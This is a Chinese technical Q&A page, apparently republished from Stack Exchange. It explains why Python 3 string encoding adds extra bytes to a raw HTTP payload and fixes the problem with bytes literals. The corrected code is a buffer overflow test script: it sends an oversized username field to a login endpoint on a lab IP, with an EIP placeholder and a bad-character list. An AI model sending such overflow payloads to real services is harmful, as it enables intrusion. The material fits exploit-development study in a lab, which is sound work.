You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

Python3为HTTP请求编码转义十六进制避免空字节的方法

问题原因及解决方法

你遇到的空字节/额外异常字节问题完全是Python3的字符串编码特性导致的,修改方案非常明确:

根因分析

Python3中普通字符串(str类型)本质是Unicode编码序列,你代码中写的"\xff"这类字面量实际对应的是Unicode码位,而非原始单字节。当你调用str.encode()方法默认用UTF-8编码时:

  • 码位在U+0080到U+00FF范围内的字符都会被编码为2字节的UTF-8序列,比如"\x80".encode()会输出b'\xc2\x80',"\xff".encode()会输出b'\xc3\xbf'
  • 多出来的\xc2、\xc3等字节就是你抓包看到的异常内容,同时你按str长度计算的Content-Length也和实际发送的字节数不匹配,进一步导致传输异常。

抓包结果示意图

解决方法

所有payload相关内容全部用bytes类型定义和拼接,全程不经过Unicode字符串的编码转换,就能保证每个字节和你预期的完全一致。

修改后的参考代码:

#!/usr/bin/python3
import sys
import socket

targetip = "192.168.168.10"
targetport = 80

try:
    # 所有payload变量全部定义为bytes类型,加b前缀
    filler = b"A" * 780
    eip = b"BBBB"
    offset = b"C" * 4
    # badchars直接定义为bytes
    badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

    inputBuffer = filler + eip + offset + badchars
    print("=" * 50)
    print("Sending evil buffer with %s bytes:" % len(inputBuffer))
    print("=" * 50)
    
    # 构造content字节流
    content = b"username="+ inputBuffer + b"&password=A"
    # 构造请求头,字符串转bytes再拼接
    request = b"POST /login HTTP/1.1\r\n"
    request += b"Host: 192.168.168.10\r\n"
    request += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n"
    request += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
    request += b"Accept-Language: en-US,en;q=0.5\r\n"
    request += b"Accept-Encoding: gzip, deflate\r\n"
    request += b"Content-Type: application/x-www-form-urlencoded\r\n"
    # 按实际字节长度计算Content-Length
    request += b"Content-Length: "+ str(len(content)).encode() + b"\r\n"
    request += b"\r\n"
    request += content
    
    print(request)
            
    # 直接发送bytes,不需要再encode
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((targetip, targetport))
    s.send(request)
    s.close()
    print("=" * 50)
    print("Complete!")
    print("=" * 50)
except Exception as e:
    print("\nCould not connect!", e)
    sys.exit(0)
sys.exit(0)

补充说明

如果你需要严格遵循application/x-www-form-urlencoded规范传输特殊字符,需要对非ASCII/控制字符做百分号编码(比如\xff编码为%FF),但如果是做缓冲区溢出测试,目标服务通常直接读取原始字节,不需要额外编码,按上面的代码直接发送即可。

内容的提问来源于stack exchange,提问作者spookymonkey

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.10.06 14:27:02